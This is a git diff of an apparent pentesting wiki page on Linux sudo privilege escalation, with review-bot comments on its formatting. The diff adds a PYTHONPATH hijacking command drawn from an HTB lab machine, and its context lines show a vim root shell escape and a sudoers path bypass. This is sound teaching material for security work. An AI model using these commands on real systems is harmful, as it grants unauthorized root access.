GitBook: [master] one page modified
parent aae1c80da6
commit a36f7f8a61
@ -688,7 +688,6 @@ Sudo configuration might allow a user to execute some command with another user
|
|||||||
|
|
||||||
```text
|
```text
|
||||||
$ sudo -l
|
$ sudo -l
|
||||||
|
|
||||||
User demo may run the following commands on crashlab:
|
User demo may run the following commands on crashlab:
|
||||||
(root) NOPASSWD: /usr/bin/vim
|
(root) NOPASSWD: /usr/bin/vim
|
||||||
```
|
```
|
||||||
@ -699,6 +698,22 @@ In this example the user `demo` can run `vim` as `root`, it is now trivial to ge
|
|||||||
sudo vim -c '!sh'
|
sudo vim -c '!sh'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### SETENV
|
||||||
|
|
||||||
|
This directive allows the user to **set an environment variable** while executing something:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ sudo -l
|
||||||
|
User waldo may run the following commands on admirer:
|
||||||
|
(ALL) SETENV: /opt/scripts/admin_tasks.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
This example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPATH hijacking** in order to load an arbitrary python library while executing the script as root:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
|
||||||
|
```
|
||||||
|
|
||||||
### Sudo execution bypassing paths
|
### Sudo execution bypassing paths
|
||||||
|
|
||||||
**Jump** to read other files or use **symlinks**. For example in sudeores file: _hacker10 ALL= \(root\) /bin/less /var/log/\*_
|
**Jump** to read other files or use **symlinks**. For example in sudeores file: _hacker10 ALL= \(root\) /bin/less /var/log/\*_
|
||||||
|
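Review bot: The added `sudo -l` output in the SETENV section is fenced as `bash`, while the unchanged NOPASSWD example in the previous hunk fences the same kind of output as `text`; tag the `User waldo may run the following commands on admirer:` block as `text` so the page stays consistent. The added sentence about PYTHONPATH hijacking also skips the step that makes the example work: nothing in the new text says that `/opt/scripts/admin_tasks.sh` ends up running a Python program, which is the only reason `PYTHONPATH` matters for this entry. Suggest one sentence stating that, and rewording "while executing something" to say that SETENV lets the caller pass environment variables on the `sudo` command line for that command. The trailing context line still reads `sudeores` (for sudoers), which could be corrected in the same edit.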